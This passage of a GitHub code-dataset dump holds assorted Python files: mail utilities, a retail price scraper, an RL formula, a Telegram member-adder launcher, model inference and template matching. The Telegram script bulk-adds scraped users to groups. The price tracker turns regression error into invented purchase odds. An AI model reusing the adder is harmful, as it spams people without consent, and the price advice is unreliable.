'\\n' + delta\n\n\ndef compare_db_dumps(db1, db2, partition_tables=None):\n \"\"\"\n :type db1: Postgresql\n :type db2: Postgresql\n :type partition_tables: list\n :return: dumped databases diff\n \"\"\"\n if partition_tables is None:\n partition_tables = []\n dump1 = db1.dump(partition_tables=partition_tables).split('\\n')\n dump2 = db2.dump(partition_tables=partition_tables).split('\\n')\n return '\\n'.join(difflib.context_diff(dump1, dump2, db1.dbname, db2.dbname, n=5, lineterm=''))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/helpers/pg_helpers.py","file_name":"pg_helpers.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21956787966","text":"import collections\nimport uuid\nfrom datetime import date\n\nfrom jinja2 import Template\nfrom src.models import db, Notes, Users\n\nfrom .logger import logging\n# from .send_email import send_email\nfrom .send_email import multi_send_send_email\n\n\ndef 
generate_uuid4_hex():\n id = uuid.uuid4()\n return id.hex\n\n\n# todo: create a generic class with templates\ndef email_template_renderer(data, ingress):\n html_email = \"\"\"\n <html>\n <head>\n <title>Test Email Sample</title>\n </head>\n <body>\n <p>{{ingress}}</p>\n <table>\n {% for value in data %}\n <tr>\n <td>\n <b>{{value[1]}}</b>\n <ul>\n <li>Subject: {{value[4]}}</li>\n <li>Text: {{value[2]}}</li>\n <li>URL: <a href=\"{{value[3]}}\">LINK</a></li>\n </ul>\n </td>\n </tr>\n {% endfor %}\n </table>\n </body>\n </html>
\n \n \n \"\"\"\n html_email_msg = Template(html_email)\n return html_email_msg.render(data=data, ingress=ingress)\n\n#\n# def send_auth_mail(alternative_id, auth_token, user_email, subject):\n# email_msg_html = email_template_renderer_auth_test(alternative_id,\n# auth_token,\n# ingress=app.config.get(\"INGRESS\"))\n# send_email_to_user(user_email, email_msg_html, subject)\n# return True\n\n\ndef send_email_manual_all(user_mail, ingress):\n # try:\n logging.info(\"mailer ::: send_email_manual_all ::: called\")\n # todo write a separate function to process email msg's\n mail_subject = user_mail.topic\n for el in user_mail.data_to_send.items():\n email_to_send = el[0]\n logging.info(f\"mailer ::: send_email_manual_all ::: send to: {email_to_send}\")\n data = el[1]\n email_msg_html = email_template_renderer(data, ingress)\n\n multi_send_send_email(str(email_to_send),\n email_msg_html,\n mail_subject=user_mail.MSG_SUBJECTS[mail_subject])\n logging.info(\"mailer ::: send_email_manual_all ::: mail sent\")\n return True, \"success\"\n\n\ndef preapare_data_for_sending(data):\n try:\n logging.info(\"mailer ::: PREAPARE_DATA_FOR_SENDING ::: called\")\n dict_x = collections.defaultdict(list)\n for el in data:\n dict_x.setdefault(el.Users.email, []).append([el.Notes.id,\n el.Notes.topic,\n el.Notes.text,\n el.Notes.url,\n el.Notes.subject,\n el.Users.username])\n logging.info(f\"mailer ::: PREAPARE_DATA_FOR_SENDING ::: dict_x: {dict_x}\")\n return dict_x\n except Exception as msg:\n logging.error(f\"mailer ::: PREAPARE_DATA_FOR_SENDING ::: ERROR {msg}\")\n\n\ndef get_date_today():\n return date.today()\n\n\ndef query_user_notes():\n logging.info(\"mailer ::: QUERY_USER_NOTES ::: called\")\n try:\n return db.session.query(Notes, Users). \\\n join(Users, Users.id == Notes.user_id). \\\n filter(Notes.repeat_at <= get_date_today()).all()\n except Exception as msg:\n logging.error(f\"mailer ::: QUERY_USER_NOTES ::: QUERY ERROR {msg}\")\n return False\n","repo_name":"wlapie40/reminder-app-py38","sub_path":"services/mailer/src/common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23274796601","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nimport re\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\"\n}\n\ndef get_product_info(url):\n # Send the GET request to the URL with the headers\n response = requests.get(url, headers=headers)\n\n # Check if the response was successful\n if response.status_code != 200:\n print(f\"The request was not successful. 
Status code: {response.status_code}\")\n exit()\n\n # Parse the HTML content of the page\n soup = BeautifulSoup(response.content, \"html.parser\")\n\n if 'amazon.in' in url:\n # Find the product name\n product_name_element = soup.find('span', {'id': 'productTitle'})\n if product_name_element:\n product_name = product_name_element.text.strip()\n\n # Find the product price\n product_price_element = soup.find('span',{'class':'a-price-whole'})\n if product_price_element:\n product_price_str = product_price_element.text.strip().replace(\",\", \"\")\n product_price = float(product_price_str)\n \n # Determine the best time to buy the product\n buying_time = determine_buying_time()\n\n return {\"product_name\": product_name, \"product_price\": product_price, \"buying_time\": buying_time}\n \n elif 'flipkart.com' in url:\n # Find the product name\n product_name_element = soup.find(\"span\", {\"class\": \"B_NuCI\"})\n product_name = product_name_element.text.strip()\n\n # Find the product price\n product_price_element= soup.find('div',{'class': '_30jeq3 _16Jk6d'})\n product_price_str = product_price_element.text.strip().replace(\",\",\"\")\n product_price_str = product_price_str.replace(\"₹\", \"\")\n product_price = float(product_price_str)\n\n # Determine the best time to buy the product\n buying_time = determine_buying_time()\n\n return {\"product_name\": product_name, \"product_price\": product_price, \"buying_time\": buying_time}\n \n elif 'snapdeal.com' in url:\n # Find the element containing the product name\n product_name_element = soup.find('h1', {'class': 'pdp-e-i-head'})\n\n # Extract the product name\n product_name = product_name_element.text.strip()\n\n # Find the element containing the product price\n price_element = soup.find('span', {'class': 'payBlkBig'})\n\n # Extract the price value\n product_price = re.sub('[^0-9]+', '', price_element.text.strip())\n\n # Determine the best time to buy the product\n buying_time = determine_buying_time()\n\n return {\"product_name\": product_name, \"product_price\": product_price, \"buying_time\": buying_time}\n\ndef determine_buying_time():\n # Load dataset of product prices over time\n df = pd.read_csv('product_prices.csv', parse_dates=['current_time'])\n\n # Create a column for days since release\n df['days_since_release'] = (df['current_time'] - pd.to_datetime('2022-10-28')).dt.days\n\n # Split the dataset into training and testing sets\n train = df[df['current_time'] < '2024-01-01']\n test = df[df['current_time'] >= '2022-01-01']\n\n # Create a linear regression model and train it on the training set\n model = LinearRegression()\n model.fit(train[['days_since_release']], train['product_price'])\n\n # Use the trained model to make predictions on the testing set\n predictions = model.predict(test[['days_since_release']])\n\n # Calculate the mean squared error of the predictions\n mse = ((predictions - test['product_price']) ** 2).mean()\n\n # Determine if it's a good time to buy the product based on the mean squared error\n if mse < 100:\n return \"This is absolutely the best time to buy this product. Don't miss out, Drop chances are lower than 15%\"\n elif mse < 1000:\n return \"This is a great time to buy this product. Drop chances are very rare and price is unlikely to drop for this product.\"\n elif mse < 10000:\n return \"Price is likely to be dropped for this product. You should wait for a little more to save some money.\"\n else:\n return \"You should absolutely wait for a price drop. 
Price seems higher than average and drop chances are above 80%\"","repo_name":"Rohan2002Pisal/Academic-projects","sub_path":"PriceTracker.py","file_name":"PriceTracker.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4862930019","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 8 14:41:57 2020\n\n@author: ithan\n\"\"\"\n\nimport numpy as np\n#Q is the Q-value\n#reward is the total reward collected\n#gamma is the discount factor\ndef pSuccess(Q, reward, gamma):\n n = np.log(Q/reward)/np.log(gamma) # corresponds to Eq. 6 of the paper. Python has no base-gamma logarithm, but by the properties of logarithms it can be computed in base 10 and divided by the logarithm of gamma. It is the same; if in doubt, review the properties of logarithms.\n log10baseGamma = np.log(10)/np.log(gamma) # A constant value, assuming gamma does not change. It is used in the next line.\n probOfSuccess = (n / (2*log10baseGamma)) + 1 # Corresponds to Eq. 7 of the paper, without considering the stochastic part.\n probOfSuccessLimit = np.minimum(1,np.maximum(0,probOfSuccess)) # Corresponds to Eq. 9 of the paper. Same as above, but limits the probability to values between 0 and 1.\n #probOfSuccessLimit = probOfSuccessLimit * (1 - stochasticity) # Use only with stochastic transitions or the sigma parameter\n return probOfSuccessLimit\n\n\n# Here, replace the call with the Q-values you obtained, the total reward received when the task is completed successfully, and your discount factor.\nprint(pSuccess(0.6, 1, 0.9))","repo_name":"IthanMoreira/DeppRL","sub_path":"pSuccess.py","file_name":"pSuccess.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19489942299","text":"import asyncio\nimport json\nfrom itertools import dropwhile\nfrom helper.account_handler import add_member, updatecount, addlogin\nfrom colorama import init, Fore\nimport pyfiglet\nimport os, random\n\nlg = Fore.LIGHTGREEN_EX\nrs = Fore.RESET\nr = Fore.RED\nw = Fore.WHITE\ncy = Fore.CYAN\n\n\ninfo = lg + '(' + w + 'i' + lg + ')' + rs\nerror = lg + '(' + r + '!' 
+ lg + ')' + rs\nsuccess = w + '(' + lg + '+' + w + ')' + rs\nINPUT = lg + '(' + cy + '~' + lg + ')' + rs\ncolors = [lg, w, r, cy]\n\n\ndef banner():\n f = pyfiglet.Figlet(font='slant')\n logo = f.renderText('Tele Adder')\n print(random.choice(colors) + logo + rs)\n \ndef clr():\n if os.name == 'nt':\n os.system('cls')\n else:\n os.system('clear')\n\nclr()\nbanner()\nprint(f' {r}Version: {w}3.1 {r}| Author: {w}SAIF ALI{rs}\\n')\nprint(f' {r}Telegram {w}@PrinceXofficial {r}| Instagram: {w}@saifalisew1508{rs}\\n')\n\n\n#option for choose username or id\noption = input('choose method username or id: ').lower() \nasync def main():\n #loads member\n try:\n user_id = (json.load(open(\"data/user.json\", encoding=\"utf-8\")))\n except:\n user_id = (json.load(open(\"data/source_user.json\", encoding=\"utf-8\")))\n\n #loads users and channel info\n config = (json.load(open(\"config.json\", encoding=\"utf-8\")))\n \n \n \n #list to chcek active member\n activelist = ['UserStatus.RECENTLY', 'UserStatus.LAST_MONTH', 'UserStatus.LAST_WEEK', 'UserStatus.OFFLINE', 'UserStatus.RECENTLY', 'UserStatus.ONLINE' ]\n #count retrive old state \n last_active = config[\"from_date_active\"]\n added = 0\n active = []\n for x in dropwhile(lambda y: y != last_active, activelist):\n active.append(x)\n await add_member(user_id, config, active, option)\n\nasyncio.run(main())\n","repo_name":"saifahmed2004/TelegramAdderTool","sub_path":"add_member.py","file_name":"add_member.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"37037761868","text":"#!/usr/bin/env python\n\nimport torch\nfrom collections import OrderedDict # noqa F401\nfrom torch.utils.data import DataLoader\nfrom catalyst.dl.experiments import SupervisedRunner\nfrom catalyst.dl.callbacks import InferCallback, CheckpointCallback\nimport json\nimport yaml\nfrom model import Finetune\nfrom experiment import Experiment\nfrom dataset import IntelSceneDataset\nimport glob\n\n\ncheckpoints = [\n [2, 4, 5],\n [1, 2, 6],\n [1, 3, 5],\n [1, 0, 4],\n [1, 0, 4]\n]\n\nif __name__ == \"__main__\":\n for model_name in [\"densenet121\", \"inception_v3\", \"resnet50\", \"resnet34\", \"resnet18\", \"se_resnet50\"]:\n for fold in range(5):\n log_dir = f\"/media/ngxbac/DATA/logs_datahack/intel-scene/{model_name}_{fold}\"\n with open(f\"{log_dir}/config.json\") as f:\n config = json.load(f)\n\n with open(\"inference.yml\") as f:\n infer_config = yaml.load(f)\n\n model = Finetune(**config['model_params']['params'])\n\n infer_csv = infer_config['data_params']['infer_csv']\n root = infer_config['data_params']['root']\n\n loaders = OrderedDict()\n if infer_csv:\n transforms = Experiment.get_transforms(stage='infer', mode='infer')\n for i, transform in enumerate(transforms):\n inferset = IntelSceneDataset(\n csv_file=infer_csv,\n root=root,\n transform=transform,\n mode='infer'\n )\n\n infer_loader = DataLoader(\n dataset=inferset,\n num_workers=4,\n shuffle=False,\n batch_size=32\n )\n\n loaders[f'infer_{i}'] = infer_loader\n \n all_checkpoints = glob.glob(f\"{log_dir}/checkpoints/stage2.*.pth\")\n\n for i, checkpoint in enumerate(all_checkpoints):\n callbacks = [\n CheckpointCallback(resume=checkpoint),\n InferCallback(out_dir=log_dir, out_prefix=\"/predict_swa_2/predictions.\" + \"{suffix}\" + f\".{i}.npy\")\n ]\n\n runner = SupervisedRunner()\n runner.infer(\n model,\n loaders,\n callbacks,\n verbose=True,\n 
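                # one inference pass per checkpoint; InferCallback saves predictions.{suffix}.{i}.npy files under log_dir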
)\n","repo_name":"ngxbac/datahack-intel-scene","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72571873514","text":"import pandas as pd\n\nproperty_df = pd.read_csv(\"sample_properties.csv\")\n\nresult_df = pd.DataFrame(columns=[\"AmenityName\", \"PropertyId\"])\n\nfor i, prop in property_df.iterrows():\n items = prop[\"amenities\"][1:-1].split(\",\")\n for item in items:\n # Remove quotes\n if item[0] == '\"':\n item = item[1:-1]\n result_df = result_df.append(\n {\"AmenityName\": item, \"PropertyId\": prop[\"id\"]}, ignore_index=True\n )\n\n\nresult_df.to_csv(\"sample_property_amenities.csv\")\n","repo_name":"daviddsouza2000/CSI2132","sub_path":"data/property_amenities.py","file_name":"property_amenities.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1349687979","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n================================================\r\nscattering_snow\r\n================================================\r\n\r\nmodelling of scattering properties of snow\r\n\r\n\"\"\"\r\n\r\n# Author: fvj\r\n# License: BSD 3 clause\r\n\r\nimport datetime\r\nimport argparse\r\nimport atexit\r\nimport glob\r\nimport os\r\nfrom warnings import warn\r\nfrom copy import deepcopy\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom pytmatrix.psd import ExponentialPSD\r\n\r\nfrom scattering_io import read_melting_hydro_part_model\r\nfrom scattering_io import read_scatt_double_layer, read_wavelength_file\r\n\r\nfrom part_descrip import compute_equi_vol_diam\r\n\r\nfrom precip import compute_elwc, compute_equi_rainfall_rate\r\n\r\nfrom refractivity import wavelength_to_band\r\n\r\nfrom scattering import compute_angular_moments, compute_scattering_canting_psd\r\nfrom scattering import compute_angular_moments_analytical\r\n\r\nfrom graph import plot_psd_scatt_profile\r\n\r\nprint(__doc__)\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n main\r\n \"\"\"\r\n # parse the arguments\r\n parser = argparse.ArgumentParser(\r\n description='Entry to snow scattering simulations framework')\r\n\r\n # keyword arguments\r\n parser.add_argument(\r\n '--input_path', type=str,\r\n default='/utemp/mdso/figuerasiventuraj/hydroscatt_products/profile_snow/',\r\n help='input data path')\r\n\r\n parser.add_argument(\r\n '--path', type=str,\r\n default='/utemp/mdso/figuerasiventuraj/hydroscatt_products/profile_snow/',\r\n help='data path')\r\n\r\n parser.add_argument(\r\n '--band', type=str,\r\n default='C',\r\n help='frequency band. Default C')\r\n\r\n parser.add_argument(\r\n '--ele', type=float,\r\n default=0.,\r\n help='elevation angle. Default 0 deg')\r\n\r\n parser.add_argument(\r\n '--rr', type=float,\r\n default=5.,\r\n help='equivalent rainfall rate. Default 5 mm/h')\r\n \r\n parser.add_argument(\r\n '--d_max', type=float,\r\n default=None,\r\n help='Maximum snowflake size. If None it will be that of the input file. Default None')\r\n\r\n parser.add_argument(\r\n '--analytical_cant_angl', type=int,\r\n default=1,\r\n help='If 1 the canting angle will be computed analytically. 
Default 1')\r\n\r\n args = parser.parse_args()\r\n\r\n print(f'====== snow scattering simulation started: '\r\n f'{datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")}')\r\n atexit.register(_print_end_msg,\r\n \"====== snow scattering simulation finished: \")\r\n\r\n if args.analytical_cant_angl == 1 and args.ele != 0:\r\n warn('The analytical computation of canting angle is only valid for '\r\n 'elevation angles close to 0 deg')\r\n return\r\n\r\n hydro_type = 'melting_snow'\r\n\r\n # Exponential distribution according to Gunn and Marshall\r\n # Ns(Dw) = N0 exp(-lamb*Dw)\r\n # N0 = 3.8e3*R^-0.87\r\n # lamb = 2.55*R^-0.48\r\n hydro_label = f'rreq{args.rr:.1f}_melting_snow'\r\n nw = 8000.\r\n lamb = 4.1*np.power(args.rr, -0.21)\r\n\r\n # parameters\r\n psd_var_list = [\r\n 'refl_h', 'refl_v', 'ldr_h', 'ldr_v', 'zdr', 'rho_hv', 'delta_hv',\r\n 'kdp', 'A_h', 'A_v', 'Adp']\r\n\r\n psd_x_var_list = [\r\n 'refl', 'ldr', 'zdr', 'rho_hv', 'delta_hv', 'kdp', 'A', 'Adp']\r\n psd_y_var_list = ['temp']\r\n\r\n print(hydro_type)\r\n print(hydro_label)\r\n print('n0', nw)\r\n print('lamb', lamb)\r\n print('band', args.band)\r\n print('elevation angle', args.ele)\r\n\r\n flist_model = glob.glob(\r\n f'{args.input_path}sp_{hydro_type}_*_model_part.csv')\r\n flist_scatt = glob.glob(\r\n f'{args.input_path}sp_{hydro_type}_{args.band}_*_tmat.out')\r\n if not flist_model or not flist_scatt:\r\n if not flist_model:\r\n warn(f'no model file at '\r\n f'{args.input_path}sp_{hydro_type}_*_model_part.csv')\r\n if not flist_scatt:\r\n warn(f'no scattering file at '\r\n f'{args.input_path}sp_{hydro_type}_{args.band}'\r\n f'_*_tmat.out')\r\n return\r\n if len(flist_model) != len(flist_scatt):\r\n warn(f'Number of model files {len(flist_model)} different from '\r\n f'number of scattering files {len(flist_scatt)}')\r\n return\r\n\r\n freq_file = (\r\n f'{args.input_path}sp_{hydro_type}_{args.band}_freq.inp')\r\n wavelength = read_wavelength_file(freq_file)\r\n band = wavelength_to_band(wavelength)\r\n\r\n ntemp = len(flist_model)\r\n psd_snow_dict = {\r\n 'temp': np.zeros(ntemp),\r\n 'alt': np.zeros(ntemp),\r\n 'lwc': np.zeros(ntemp),\r\n 'rr': np.zeros(ntemp)\r\n }\r\n for var in psd_var_list:\r\n psd_snow_dict.update({var: np.zeros(ntemp)})\r\n\r\n # output file name\r\n fname = (\r\n f'{args.path}psd_profile_{hydro_label}_{band}'\r\n f'_ele{int(args.ele*100.):05d}_scattering.csv')\r\n for ind_temp, (model_file, scatt_file) in enumerate(zip(\r\n flist_model, flist_scatt)):\r\n df_model, temp = read_melting_hydro_part_model(\r\n model_file, d_max=args.d_max)\r\n n_sf = df_model.shape[0]\r\n df_scatt = read_scatt_double_layer(scatt_file, nrows=n_sf)\r\n\r\n psd_snow_dict['temp'][ind_temp] = temp\r\n print('temp', temp)\r\n print('computing angular moments ...')\r\n canting_angle_snow = 40.+df_model['fmw'].values*(10-40)\r\n if args.analytical_cant_angl:\r\n ang_moments_dict = compute_angular_moments_analytical(\r\n canting_angle_snow)\r\n else:\r\n ang_moments_dict = compute_angular_moments(\r\n canting_angle_snow, ele=args.ele)\r\n\r\n print('computing PSD scattering parameters of melting snowflakes ...')\r\n\r\n # equivalent raindrop diameter\r\n d_rd = compute_equi_vol_diam(df_model['mass'].values)\r\n psd_rain = ExponentialPSD(\r\n N0=nw, Lambda=lamb, D_max=d_rd[-1])\r\n psd_vals_rain = psd_rain(d_rd)\r\n delta_d_rain = d_rd - np.append(0, d_rd[:-1])\r\n\r\n delta_d_snow = (\r\n df_model['d_init'].values\r\n - np.append(0, df_model['d_init'].values[:-1]))\r\n\r\n vel_snow = df_model['vel'].values\r\n\r\n if 
np.isclose(temp, 0):\r\n vel_snow0 = deepcopy(vel_snow)\r\n\r\n psd_vals_snow = psd_vals_rain*delta_d_rain/delta_d_snow\r\n\r\n # conservation of the flux\r\n psd_vals_snow *= (vel_snow0/vel_snow)\r\n\r\n psd_snow_dict['lwc'][ind_temp] = compute_elwc(\r\n delta_d_snow, df_model['mass'].values, psd_vals_snow)\r\n psd_snow_dict['rr'][ind_temp] = compute_equi_rainfall_rate(\r\n delta_d_snow, df_model['mass'].values, psd_vals_snow,\r\n vel_snow)\r\n\r\n snow_psd_dict = compute_scattering_canting_psd(\r\n wavelength, df_scatt['fv180'].values, df_scatt['fh180'].values,\r\n df_scatt['fv0'].values, df_scatt['fh0'].values, ang_moments_dict,\r\n delta_d_snow, psd_vals_snow, var_list=psd_var_list)\r\n\r\n for var in psd_var_list:\r\n psd_snow_dict[var][ind_temp] = snow_psd_dict[var]\r\n\r\n # save DSD scattering results\r\n psd_snow_dict_aux = {}\r\n for key, value in psd_snow_dict.items():\r\n psd_snow_dict_aux.update({key: [value[ind_temp]]})\r\n df_snow_psd_aux = pd.DataFrame.from_dict(psd_snow_dict_aux)\r\n df_snow_psd_aux.to_csv(\r\n fname, index=False, mode='a', header=not os.path.exists(fname))\r\n print(f'saved {fname}')\r\n\r\n # plot profile\r\n df_snow_psd = pd.DataFrame.from_dict(psd_snow_dict)\r\n plot_psd_scatt_profile(\r\n df_snow_psd, args.path, band, hydro_label, ele=args.ele,\r\n x_var_list=psd_x_var_list, y_var_list=psd_y_var_list)\r\n\r\n\r\ndef _print_end_msg(text):\r\n \"\"\"\r\n prints end message\r\n\r\n Parameters\r\n ----------\r\n text : str\r\n the text to be printed\r\n\r\n Returns\r\n -------\r\n Nothing\r\n\r\n \"\"\"\r\n print(text + datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\"))\r\n\r\n\r\n# ---------------------------------------------------------\r\n# Start main:\r\n# ---------------------------------------------------------\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"openradar/hydroscatt","sub_path":"hydroscatt/scattering_snow_profile.py","file_name":"scattering_snow_profile.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31821254690","text":"import random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom MessageType import MessageType\nfrom Message import ComputeMessage\n\n\ndef fed_avg(caller, targets):\n N = 1000 # number of data points\n model_iterations = 1000\n server_weights = torch.randn(1, 1) * 100\n\n def compute_map(target_ids, result):\n new_results = {}\n for target_id, (X, t) in result.items():\n # initialise client model with server model\n client_model = nn.Linear(1, 1)\n with torch.no_grad():\n client_model.weight.copy_(server_weights)\n\n optimizer = optim.SGD(client_model.parameters(), lr=0.05)\n loss_fn = nn.MSELoss()\n for _ in range(model_iterations):\n optimizer.zero_grad()\n predictions = client_model(X)\n loss = loss_fn(predictions, t)\n loss.backward()\n optimizer.step()\n new_A = list(client_model.parameters())[0].data[0, 0].numpy()\n new_b = list(client_model.parameters())[1].data[0].numpy()\n new_results[target_id] = np.array((new_A, new_b))\n return new_results\n\n def compute_reduce(target_ids, result):\n client_models = np.array(list(result.values()))\n new_params = np.mean(client_models, axis=0)\n return new_params\n \n def fetch_data(target_ids, result):\n A = np.random.uniform(3, 4)\n b = np.random.uniform(5, 6)\n error = 0.1\n X = Variable(torch.randn(N, 1))\n t = A * X + b + Variable(torch.randn(N, 1) * error)\n 
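Isolated numpy sketch of the PSD rebinning at the heart of the snow-profile loop above: the exponential raindrop PSD is mapped onto snowflake size bins by keeping the particle count per bin, then scaled by the fall-speed ratio so the flux through each level is conserved. All arrays here are synthetic stand-ins for what the script reads from its model files.

import numpy as np

n0, lam = 8000.0, 4.1 * 5.0 ** -0.21      # PSD parameters as in the record, rr = 5 mm/h
d_rain = np.linspace(0.1, 6.0, 50)        # equivalent melted diameters (mm)
d_snow = 2.5 * d_rain                     # hypothetical snowflake sizes (mm)
vel_snow0 = np.full_like(d_snow, 1.0)     # fall speeds at the melting-layer top
vel_snow = np.full_like(d_snow, 1.4)      # fall speeds at the current level

psd_rain = n0 * np.exp(-lam * d_rain)     # N(D) = N0 * exp(-lambda * D)
dd_rain = np.diff(d_rain, prepend=0.0)
dd_snow = np.diff(d_snow, prepend=0.0)

psd_snow = psd_rain * dd_rain / dd_snow   # same particle count per size bin
psd_snow *= vel_snow0 / vel_snow          # conserve the flux between levels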
return (X, t)\n\n compute_functions = {\n MessageType.COMPUTE_AGGREGATE: compute_reduce,\n MessageType.COMPUTE_MAP: compute_map,\n MessageType.DATA: fetch_data,\n }\n\n computation = ComputeMessage('FED_AVG', targets, caller=caller, compute_functions=compute_functions)\n return computation\n","repo_name":"pribanacek/part-iii-project","sub_path":"src/test_computations/federated_average.py","file_name":"federated_average.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11560002434","text":"import cv2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\nplt.rcParams['figure.figsize'] = (10.0, 8.0) # set default size of plots\r\nplt.rcParams['image.interpolation'] = 'nearest'\r\nplt.rcParams['image.cmap'] = 'gray'\r\nnp.set_printoptions(threshold=np.inf)\r\n\r\n\r\ndef cross_correlation(image, template):\r\n \"\"\"Fast convolution into correlation\"\"\"\r\n Hk, Wk = template.shape\r\n Hi, Wi = image.shape\r\n out = np.zeros((Hi, Wi))\r\n\r\n for i in range(Hi - Hk + 1):\r\n for j in range(Wi - Wk + 1):\r\n out[i + Hk // 2, j + Wk // 2] = np.sum(image[i: i + Hk, j: j + Wk] * template)\r\n return out\r\n\r\n\r\ndef match_template(image_gray, template):\r\n \"\"\"Встроенная функция корреляции в cv2\"\"\"\r\n res = cv2.matchTemplate(image_gray, template, cv2.TM_CCOEFF_NORMED)\r\n plt.figure(figsize=(15, 5))\r\n plt.imshow(res, cmap='gray')\r\n plt.title('Карта корреляции')\r\n plt.show()\r\n\r\n\r\ndef zero_mean_cross_correlation(image, template):\r\n \"\"\"Нормировка по среднему значению шаблона\"\"\"\r\n Hk, Wk = template.shape\r\n Hi, Wi = image.shape\r\n out = np.zeros((Hi, Wi))\r\n mean = np.mean(template)\r\n template = template - mean\r\n\r\n for i in range(Hi - Hk + 1):\r\n for j in range(Wi - Wk + 1):\r\n out[i + Hk // 2, j + Wk // 2] = np.sum(image[i: i + Hk, j: j + Wk] * template)\r\n return out\r\n\r\n\r\ndef draw_correlation(temp, image, cc_matrix, x, y, name):\r\n \"\"\"Выводит графики корреляции\"\"\"\r\n plt.figure(figsize=(20, 15))\r\n plt.subplot(311), plt.imshow(temp), plt.title('Template'), plt.axis('off')\r\n\r\n plt.subplot(312), plt.imshow(image), plt.title('Image'), plt.axis('off')\r\n plt.plot(x, y, 'rx', ms=40, mew=10)\r\n\r\n plt.subplot(313), plt.imshow(cc_matrix), plt.title(name), plt.axis('off')\r\n\r\n\r\n plt.show()\r\n\r\n\r\ndef normalized_cross_correlation(image, template):\r\n \"\"\"Нормированная кросс-корреляция\"\"\"\r\n Hk, Wk = template.shape\r\n Hi, Wi = image.shape\r\n out = np.zeros((Hi, Wi))\r\n mean = np.mean(template)\r\n template = (template - mean) / np.std(template)\r\n\r\n for i in range(Hi - Hk + 1):\r\n for j in range(Wi - Wk + 1):\r\n a = image[i: i + Hk, j: j + Wk]\r\n out[i + Hk // 2, j + Wk // 2] = np.sum((((a - np.mean(a)) / np.std(a)) * template))\r\n return out\r\n\r\n\r\nimage = cv2.imread('images/shelf.jpg')\r\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\nimage_grey = cv2.imread('images/shelf.jpg', 0)\r\ntemp = cv2.imread('images/template.jpg')\r\ntemp = cv2.cvtColor(temp, cv2.COLOR_BGR2RGB)\r\ntemp_grey = cv2.imread('images/template.jpg', 0)\r\n\r\n\r\ncross_correlation_matrix = cross_correlation(image_grey, temp_grey)\r\ny, x = np.unravel_index(cross_correlation_matrix.argmax(), cross_correlation_matrix.shape)\r\ndraw_correlation(temp, image, cross_correlation_matrix, x, y, 'Cross-correlation')\r\n\r\ncross_correlation_matrix = zero_mean_cross_correlation(image_grey, temp_grey)\r\ny, x = 
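The `compute_reduce` step above is the FedAvg aggregation: element-wise averaging of per-client parameters. A standalone sketch, with a sample-size-weighted variant (the form in the original FedAvg paper) shown for comparison; the client values and counts are illustrative.

import numpy as np

client_params = np.array([[3.1, 5.2],     # one fitted (A, b) row per client
                          [3.4, 5.6],
                          [3.2, 5.4]])
n_samples = np.array([1000, 1000, 500])   # hypothetical per-client data sizes

unweighted = client_params.mean(axis=0)   # what compute_reduce does above
weighted = (client_params * n_samples[:, None]).sum(axis=0) / n_samples.sum()
print(unweighted)   # plain mean of the three clients
print(weighted)     # larger clients pull the average toward themselves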
np.unravel_index(cross_correlation_matrix.argmax(), cross_correlation_matrix.shape)\r\ndraw_correlation(temp, image, cross_correlation_matrix, x, y, 'Zero mean cross-correlation')\r\n\r\n\r\nimage = cv2.imread('images/shelf_dark.jpg')\r\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\nimage_grey = cv2.imread('images/shelf_dark.jpg', 0)\r\n\r\nout = normalized_cross_correlation(image_grey, temp_grey)\r\ny, x = np.unravel_index(out.argmax(), out.shape)\r\ndraw_correlation(temp, image, out, x, y, 'Normalized cross-correlation')\r\n","repo_name":"Fru1tJu1ce/mipt_cv","sub_path":"cross-correlation/task_2_ch.py","file_name":"task_2_ch.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73249573674","text":"def summary(arr):\n r, acc = [], 0\n for i in range(len(arr) - 1):\n acc += arr[i + 1] - arr[i]\n r.append(acc)\n\n l, r = 0, sum(r)\n res = r\n for i in range(1, len(arr)):\n l += i * (arr[i] - arr[i - 1])\n r -= (len(arr) - i) * (arr[i] - arr[i - 1])\n res += r + l\n\n 